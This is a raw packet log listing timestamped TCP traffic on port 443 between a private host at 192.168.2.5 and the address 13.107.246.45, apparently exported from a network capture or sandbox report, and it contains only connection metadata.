Oct 7, 2024 03:15:53.283755064 CEST	443	49924	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.283837080 CEST	443	49920	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.283915997 CEST	443	49920	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.284020901 CEST	49920	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.284049988 CEST	49920	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.284066916 CEST	443	49920	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.284077883 CEST	49920	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.284084082 CEST	443	49920	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.285914898 CEST	49925	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.285949945 CEST	443	49925	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.286010981 CEST	49925	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.286164999 CEST	49925	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.286180973 CEST	443	49925	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.391716003 CEST	443	49921	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.392163992 CEST	49921	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.392194033 CEST	443	49921	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.392631054 CEST	49921	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.392637968 CEST	443	49921	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.404294968 CEST	443	49922	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.404619932 CEST	49922	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.404629946 CEST	443	49922	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.405002117 CEST	49922	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.405008078 CEST	443	49922	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.492656946 CEST	443	49921	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.493289948 CEST	443	49921	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.493345976 CEST	443	49921	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.493422985 CEST	49921	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.493587971 CEST	49921	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.493617058 CEST	443	49921	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.493626118 CEST	49921	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.493632078 CEST	443	49921	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.496395111 CEST	49926	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.496488094 CEST	443	49926	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.496578932 CEST	49926	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.496699095 CEST	49926	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.496712923 CEST	443	49926	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.503374100 CEST	443	49922	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.503665924 CEST	443	49922	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.503724098 CEST	49922	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.503746033 CEST	49922	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.503760099 CEST	443	49922	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.503767014 CEST	49922	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.503772020 CEST	443	49922	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.505764008 CEST	49927	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.505796909 CEST	443	49927	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.505861998 CEST	49927	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.505978107 CEST	49927	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.505991936 CEST	443	49927	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.915014029 CEST	443	49923	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.915615082 CEST	49923	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.915637016 CEST	443	49923	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.916130066 CEST	49923	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.916136026 CEST	443	49923	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.930048943 CEST	443	49924	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.930418015 CEST	49924	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.930428028 CEST	443	49924	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.931016922 CEST	49924	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.931024075 CEST	443	49924	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.967164993 CEST	443	49925	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.967927933 CEST	49925	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.967964888 CEST	443	49925	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.968260050 CEST	49925	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.968274117 CEST	443	49925	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.013895035 CEST	443	49923	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.013926983 CEST	443	49923	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.013971090 CEST	443	49923	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.014025927 CEST	49923	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.014048100 CEST	49923	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.014281034 CEST	49923	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.014298916 CEST	443	49923	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.014312029 CEST	49923	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.014317989 CEST	443	49923	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.017297983 CEST	49928	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.017352104 CEST	443	49928	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.017460108 CEST	49928	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.017613888 CEST	49928	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.017627001 CEST	443	49928	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.031660080 CEST	443	49924	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.031737089 CEST	443	49924	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.031905890 CEST	49924	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.031943083 CEST	49924	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.031943083 CEST	49924	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.031959057 CEST	443	49924	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.031968117 CEST	443	49924	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.034579039 CEST	49930	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.034626007 CEST	443	49930	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.034713030 CEST	49930	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.034857988 CEST	49930	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.034869909 CEST	443	49930	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.071249962 CEST	443	49925	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.071361065 CEST	443	49925	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.071460962 CEST	49925	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.071733952 CEST	49925	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.071757078 CEST	443	49925	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.071770906 CEST	49925	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.071778059 CEST	443	49925	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.074261904 CEST	49931	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.074282885 CEST	443	49931	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.074358940 CEST	49931	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.074517965 CEST	49931	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.074527979 CEST	443	49931	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.144454956 CEST	443	49927	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.147136927 CEST	49927	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.147161007 CEST	443	49927	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.147665977 CEST	49927	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.147675991 CEST	443	49927	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.177675962 CEST	443	49926	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.178117990 CEST	49926	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.178153992 CEST	443	49926	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.178534985 CEST	49926	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.178543091 CEST	443	49926	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.282464027 CEST	443	49926	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.282752991 CEST	443	49926	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.282835007 CEST	49926	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.282880068 CEST	49926	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.282880068 CEST	49926	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.282906055 CEST	443	49926	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.282917023 CEST	443	49926	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.285458088 CEST	49932	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.285495996 CEST	443	49932	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.285712957 CEST	49932	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.285713911 CEST	49932	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.285748959 CEST	443	49932	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.651109934 CEST	443	49928	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.651787043 CEST	49928	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.651825905 CEST	443	49928	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.652332067 CEST	49928	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.652338982 CEST	443	49928	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.674781084 CEST	443	49930	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.675179005 CEST	49930	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.675204992 CEST	443	49930	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.675652027 CEST	49930	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.675662041 CEST	443	49930	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.693958044 CEST	443	49927	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.693990946 CEST	443	49927	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.694045067 CEST	49927	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.694046974 CEST	443	49927	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.694097042 CEST	49927	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.694222927 CEST	49927	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.694243908 CEST	443	49927	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.694261074 CEST	49927	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.694266081 CEST	443	49927	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.697474003 CEST	49933	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.697518110 CEST	443	49933	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.697588921 CEST	49933	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.697880983 CEST	49933	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.697894096 CEST	443	49933	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.738770008 CEST	443	49931	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.739202976 CEST	49931	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.739234924 CEST	443	49931	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.739655972 CEST	49931	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.739661932 CEST	443	49931	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.750338078 CEST	443	49928	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.750500917 CEST	443	49928	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.750562906 CEST	49928	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.750612974 CEST	49928	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.750612974 CEST	49928	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.750637054 CEST	443	49928	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.750648975 CEST	443	49928	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.753156900 CEST	49934	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.753209114 CEST	443	49934	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.753626108 CEST	49934	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.753781080 CEST	49934	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.753798008 CEST	443	49934	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.774117947 CEST	443	49930	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.774234056 CEST	443	49930	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.774286985 CEST	49930	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.774296999 CEST	443	49930	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.774348021 CEST	49930	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.774425030 CEST	49930	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.774425030 CEST	49930	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.774444103 CEST	443	49930	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.774454117 CEST	443	49930	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.778070927 CEST	49935	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.778106928 CEST	443	49935	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.778403997 CEST	49935	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.778520107 CEST	49935	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.778537035 CEST	443	49935	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.840904951 CEST	443	49931	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.841295958 CEST	443	49931	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.841402054 CEST	49931	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.841602087 CEST	49931	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.841630936 CEST	443	49931	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.841645002 CEST	49931	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.841651917 CEST	443	49931	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.844244003 CEST	49936	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.844297886 CEST	443	49936	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.844376087 CEST	49936	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.844533920 CEST	49936	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.844549894 CEST	443	49936	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.935317993 CEST	443	49932	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.935882092 CEST	49932	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.935909033 CEST	443	49932	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:54.936350107 CEST	49932	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:54.936357021 CEST	443	49932	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.035439014 CEST	443	49932	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.035469055 CEST	443	49932	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.035517931 CEST	443	49932	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.035579920 CEST	49932	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.035620928 CEST	49932	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.035887003 CEST	49932	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.035913944 CEST	443	49932	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.035928011 CEST	49932	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.035933971 CEST	443	49932	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.038919926 CEST	49937	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.038979053 CEST	443	49937	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.039074898 CEST	49937	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.039233923 CEST	49937	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.039249897 CEST	443	49937	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.373156071 CEST	443	49933	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.373697042 CEST	49933	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.373738050 CEST	443	49933	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.374169111 CEST	49933	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.374176979 CEST	443	49933	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.390495062 CEST	443	49934	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.390829086 CEST	49934	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.390855074 CEST	443	49934	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.391190052 CEST	49934	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.391196012 CEST	443	49934	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.414678097 CEST	443	49935	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.415047884 CEST	49935	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.415083885 CEST	443	49935	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.415406942 CEST	49935	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.415411949 CEST	443	49935	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.476716042 CEST	443	49933	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.476813078 CEST	443	49933	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.476907015 CEST	49933	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.477132082 CEST	49933	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.477155924 CEST	443	49933	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.477173090 CEST	49933	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.477180004 CEST	443	49933	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.479986906 CEST	49938	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.480024099 CEST	443	49938	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.480098963 CEST	49938	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.480226040 CEST	49938	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.480240107 CEST	443	49938	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.489375114 CEST	443	49934	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.489536047 CEST	443	49934	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.489639997 CEST	49934	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.489842892 CEST	49934	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.489857912 CEST	443	49934	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.489892960 CEST	49934	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.489898920 CEST	443	49934	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.492785931 CEST	49939	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.492856979 CEST	443	49939	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.492933035 CEST	49939	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.493060112 CEST	49939	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.493071079 CEST	443	49939	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.494154930 CEST	443	49936	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.494488955 CEST	49936	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.494501114 CEST	443	49936	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.494940996 CEST	49936	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.494947910 CEST	443	49936	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.512550116 CEST	443	49935	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.512806892 CEST	443	49935	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.512934923 CEST	49935	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.513154984 CEST	49935	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.513154984 CEST	49935	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.513179064 CEST	443	49935	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.513190031 CEST	443	49935	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.515789986 CEST	49940	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.515834093 CEST	443	49940	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.515903950 CEST	49940	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.516056061 CEST	49940	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.516067982 CEST	443	49940	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.595082998 CEST	443	49936	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.595181942 CEST	443	49936	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.595230103 CEST	443	49936	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.595263004 CEST	49936	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.595303059 CEST	49936	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.595536947 CEST	49936	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.595561028 CEST	443	49936	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.595575094 CEST	49936	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.595585108 CEST	443	49936	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.598364115 CEST	49941	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.598417044 CEST	443	49941	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.599410057 CEST	49941	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.599561930 CEST	49941	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.599584103 CEST	443	49941	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.685605049 CEST	443	49937	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.686131954 CEST	49937	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.686153889 CEST	443	49937	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.686610937 CEST	49937	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.686615944 CEST	443	49937	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.787153006 CEST	443	49937	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.787230015 CEST	443	49937	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.787286043 CEST	49937	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.787452936 CEST	49937	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.787452936 CEST	49937	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.787473917 CEST	443	49937	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.787482977 CEST	443	49937	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.791433096 CEST	49942	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.791474104 CEST	443	49942	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:55.791568995 CEST	49942	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.791786909 CEST	49942	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:55.791800022 CEST	443	49942	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.140430927 CEST	443	49939	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.140819073 CEST	49939	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.140861034 CEST	443	49939	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.141280890 CEST	49939	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.141289949 CEST	443	49939	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.147036076 CEST	443	49938	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.147404909 CEST	49938	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.147428036 CEST	443	49938	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.147928953 CEST	49938	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.147933960 CEST	443	49938	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.182746887 CEST	443	49940	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.183243990 CEST	49940	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.183281898 CEST	443	49940	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.183702946 CEST	49940	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.183708906 CEST	443	49940	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.241503000 CEST	443	49939	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.241736889 CEST	443	49939	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.241817951 CEST	49939	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.241914034 CEST	49939	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.241939068 CEST	443	49939	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.241969109 CEST	49939	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.241976976 CEST	443	49939	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.245091915 CEST	49944	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.245141983 CEST	443	49944	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.245213985 CEST	49944	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.245357037 CEST	49944	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.245372057 CEST	443	49944	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.254755020 CEST	443	49938	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.254941940 CEST	443	49938	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.255050898 CEST	49938	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.255050898 CEST	49938	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.255050898 CEST	49938	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.257397890 CEST	49945	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.257437944 CEST	443	49945	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.257505894 CEST	49945	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.257642984 CEST	49945	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.257661104 CEST	443	49945	13.107.246.45	192.168.2.5
